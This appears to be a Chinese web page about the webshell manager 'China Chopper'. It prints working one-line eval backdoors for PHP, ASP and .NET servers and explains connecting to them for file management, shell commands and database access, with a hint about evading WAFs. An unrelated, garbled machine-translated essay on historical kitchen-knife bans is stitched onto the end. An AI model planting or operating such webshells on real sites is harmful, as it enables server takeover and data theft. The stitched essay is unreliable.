渗透工具中国菜刀,菜刀 渗透

导航：

• 1、中国菜刀的功能介绍：
• 2、用中国菜刀连接一句话木马时为何会出现加载失败问题
• 3、历朝历代，多次禁用菜刀，为什么？

中国菜刀的功能介绍：

只要支持动态脚本的网站，都可以用中国菜刀来进行管理！主要功能有：文件管理，虚拟终端，数据库管理。

UINCODE方式编译，支持多国语言输入显示。

一、EVAL客户端部分

1）要了解的

服务端只需要简单的一行代码，即可用此程序实现常用的管理功能。

支持的服务端脚本：PHP, ASP，NET。

在服务端运行的代码如下：

PHP: ?php @eval($_POST['pass']);?

ASP: %eval request(pass)%

.NET: %@ Page Language=Jscript%%eval(Request.Item[pass],unsafe);%

(注意: .NET要单独一个文件或此文件也是Jscript语言)

2）怎么用

在主视图中右键/添加，在弹出的对话框中输入服务端地址，连接的密码(请注意上例中的pass字串)，选择正确的脚本类型和语言编码，保存后即可使用文件管理，虚拟终端，数据库管理三大块功能。要是其它都没错误，那么可能就是你把语言编码选错了。

1. 文件管理：[特色]缓存下载目录，并支持离线查看缓存目录;

2.虚拟终端：[特色]人性化的设计，操作方便;(输入HELP查看更多用法)

3.数据库管理：[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS

以入支持ADO方式连接的数据库。

(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)

注意：由于服务器的安全设置，某些功能可能不能正常使用。

3) 关于配置信息怎么填？

A) 数据库方面：

PHP脚本：

T类型/T 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种

H主机地址H 主机地址可为机器名或IP地址，如localhost

U数据库用户/U 连接数据库的用户名，如root

P数据库密码/P 连接数据库的密码，如123455

ASP和.NET脚本：

T类型/T 类型只能填ADO

CADO配置信息/C

ADO连接各种数据库的方式不一样。如MSSQL的配置信息为

Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456

B) 其它方面：

添加额外附加提交的数据：应付这种情况：if ($_POST['action']=='test'){@eval($_POST['pass']);}

Oaction=test/O

提交功能前先POST额外的数据包：会话期间只提交一次。

DATAuid=user1pwd=123456/DATA

二、网站蜘蛛

织出一张网站的目录结构。

下载的列表文件存在桌面，右键菜单/载入URL列表即可以根据地址得到目录结构。

三、定时提醒

当闹钟事使吧, 周期：每月/每周/每日/只一次。

四、快速启动

一些常用的快捷方式放在这里，可以指定用户身份运行程序。这部分数据是以加密存储的。

五、浏览器

地址栏输入HELP，更多精彩后续加入。

六、其它部分

等待加入。

附带工具

update.exe是wsc.exe的数据库wscdb迁移到菜刀的一个小工具。

把wscdb文件整到当前目录，运行update.exe得到新的数据库文件caidao.mdb

把菜刀的数据库db.mdb替换掉即可。

用中国菜刀连接一句话木马时为何会出现加载失败问题

刀菜需要自己做变形，加载失败可能是服务器WAF拦截了，传统一句话优化看这：那些强悍的PHP一句话后门；推荐使用新技术：“冰蝎”动态二进制加密网站管理客户端，WebShell工具

历朝历代，多次禁用菜刀，为什么？

历朝历代，多次禁用菜刀，为什么？因为危险，古人说：“在中午，你必须用刀来切东西。”只要你手里拿着刀，你就不可避免地要切东西。谁能保证每个人都用菜刀切瓜菜？而且菜刀钻穿了中国控刀的漏洞，刀尖角度大于60，不受法律管制。你知道，这种方头方脑的男人在伤害别人的时候并不含糊。新闻中的暴力事件和杀人犯用菜刀伤人的事件屡见不鲜，令人不寒而栗。说到这一点，很多朋友都不同意禁止菜刀会给人们的生活带来不便。考虑到宋代没有禁止使用刀具这一事实。

禁用菜刀，给人们带来不便。这也是宋代社道的含义，但持这种理论的人不应忘记宋江和方腊是在宋代出现的。即使没有什么不便，正如俗话所说的“两害相权取其轻”，吃肉也是小的，治安也是大的。此外，现在有各种各样的工具用于切割丝绸、切片、切片和切割工件，无论是电动的还是手动的。你为什么要用一把外形凶猛、外表邪恶的菜刀？至于屠宰，它可以被电死、勒死、淹死、冲死、撞死、踢死、中毒、吸烟，甚至被说服自杀。

刀是最致命的武器。曹操准备参军，与工匠一起制作简陋的手工刀。卑微的手刀是一种短刀，但曹操说，“小能变大”，可以用短和长来形容。因此，你不必投下欧耶将军。你不必戴玉环和金戒指。你不必砍掉犀牛和犀牛。只要是刀，就是国家的利器，不能随便给人。

马荣明的刀上写着“文木木，有天之力”，说只有伟大的人才配得上用刀。普通人不应该每天用刀。顶部有刀和斧子，底部有刀和脚。够了。至于中间，无论是杨云的大刀、陈小刀、铅刀、书刀、荣刀、栾刀、瓦刀、厨刀、三尖双刃刀还是青龙燕月刀，都是禁止的。应该注意的是，药刀是钝的。陈淑玲还被用来割断太子弟弟的后颈。至于元朝，很多人可能都听说过，为了防止汉朝叛乱，元朝规定“十家一刀”，朝廷会定期检查。甚至还说，除了做饭，这把菜刀到处都是蒙古包昌临时保管的。任何想做饭的人都需要申请批准才能使用。